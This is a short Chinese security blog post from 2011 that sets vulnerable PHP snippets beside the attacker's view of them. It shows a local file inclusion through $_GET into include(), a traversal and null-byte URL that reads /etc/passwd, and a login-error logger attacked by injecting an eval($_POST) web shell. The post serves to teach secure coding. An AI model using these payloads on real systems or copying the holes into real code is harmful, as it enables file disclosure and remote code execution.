PHP安全新闻早8点_1116

//2011-11-16 星期三 
// 程序员的思维： 
// Micropoor.php ---代码片段 
<?php 
$Micropoor=$_GET[Micropoor]; 
include($Micropoor.'php'); 
?> 
//我们的思维： 
[url]http://www.127.0.0.1/Micropoor.php?Micropoor=/http://www.cnblogs.com/http://www.cnblogs.com/../etc/passwd%00[url] 
 
// 程序员的思维：      
// Micropoor.php ---代码片段 
<?php 
//略 
  $fp = fopen($cacheFile, 'w'); 
  fwrite($fp, $myvalues); 
  fclose($fp); 
//略 
?> 
 //login.php  ---代码片段 
<?php 
    $username=$_POST[‘username’]; 
    $password=$_POST[‘password’]; 
    $centent=time().”用户名$username登录错误，登录密码为：$password”; 
    $sql={sql}…. 
    If(!={sql}){   
            $fp = fopen(error.php, 'w'); 
         fwrite($fp, $centent); 
         fclose($fp); 
    echo “用户名或者密码错误!” 
    } 
?> 
//我们的思维： 
*POST: username or password  inject -> <?php%20eval($_POST[Micropoor])%20?>

posted @ 2011-11-18 11:34 noevil 阅读(204) 评论(0) 编辑收藏举报

刷新页面返回顶部

Think Different!

今天只谈技术.

PHP安全新闻早8点_1116

公告